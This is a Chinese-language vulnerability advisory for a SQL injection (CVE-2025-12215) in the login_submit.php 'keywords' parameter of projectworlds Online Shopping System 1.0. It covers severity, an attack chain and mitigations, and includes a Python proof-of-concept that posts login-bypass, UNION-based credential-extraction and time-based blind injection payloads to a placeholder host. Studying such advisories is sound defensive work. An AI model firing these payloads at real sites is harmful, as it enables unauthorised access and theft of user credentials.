CVE-2025-12215 CVSS 7.3 高危

CVE-2025-12215 projectworlds在线购物系统login_submit.php SQL注入漏洞

披露日期: 2025-10-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-12215

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

projectworlds Online Shopping System 1.0

漏洞概述

CVE-2025-12215是projectworlds在线购物系统1.0版本中的一个高危SQL注入漏洞。该漏洞存在于登录提交文件login_submit.php中，攻击者可以通过操纵keywords参数进行SQL注入攻击。由于该漏洞无需认证即可利用，且可通过网络远程发起攻击，因此具有较高的安全风险。攻击者成功利用此漏洞可获取数据库中的敏感信息，包括用户凭据、个人数据、订单信息等，甚至可能在某些配置下实现系统权限提升或远程代码执行。该漏洞的CVSS评分为7.3，属于高危级别，需要尽快采取修复措施。

技术细节

该SQL注入漏洞发生在/login_submit.php文件的keywords参数处理逻辑中。应用程序在处理用户输入时未对keywords参数进行充分的输入验证和SQL语句参数化，直接将用户可控的输入拼接到SQL查询语句中。攻击者可以通过构造恶意SQL payloads绕过登录验证或提取数据库中的敏感信息。攻击向量为网络路径，攻击复杂度低，无需认证和用户交互即可发起攻击。成功利用后可导致机密性、完整性和可用性均受到低等级影响。建议使用参数化查询或预编译语句重构代码，并实施严格的输入验证机制。

攻击链分析

STEP 1

步骤1

攻击者识别目标网站使用projectworlds Online Shopping System 1.0

STEP 2

步骤2

访问/login_submit.php登录页面

STEP 3

步骤3

构造恶意SQL注入payload到keywords参数

STEP 4

步骤4

发送恶意请求，绕过认证或提取数据库数据

STEP 5

步骤5

获取用户凭据或敏感信息

STEP 6

步骤6

利用获取的信息进行进一步攻击或数据窃取

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-12215 SQL Injection PoC
# Target: projectworlds Online Shopping System 1.0
# Endpoint: /login_submit.php
# Parameter: keywords

target_url = "http://target.com/login_submit.php"

# Basic SQL Injection test payloads
payloads = [
    "' OR '1'='1",
    "' OR '1'='1' --",
    "admin' OR '1'='1",
    "' UNION SELECT NULL--",
    "' UNION SELECT username,password FROM users--"
]

for payload in payloads:
    data = {
        'keywords': payload
    }
    try:
        response = requests.post(target_url, data=data, timeout=10)
        if response.status_code == 200:
            print(f"Payload: {payload}")
            print(f"Status: {response.status_code}")
            print(f"Response Length: {len(response.text)}")
            print("-" * 50)
    except requests.exceptions.RequestException as e:
        print(f"Error: {e}")

# Blind SQL Injection verification
blind_payload = "' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END)--"
data_blind = {'keywords': blind_payload}
print(f"Testing blind SQL injection: {blind_payload}")

影响范围

projectworlds Online Shopping System 1.0

防御指南

临时缓解措施

立即对/login_submit.php文件进行修复，使用参数化查询替代字符串拼接方式处理keywords参数。对用户输入实施白名单过滤机制，限制可接受字符类型。建议临时使用WAF规则阻止可疑的SQL注入特征payload，同时尽快应用官方发布的安全更新。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表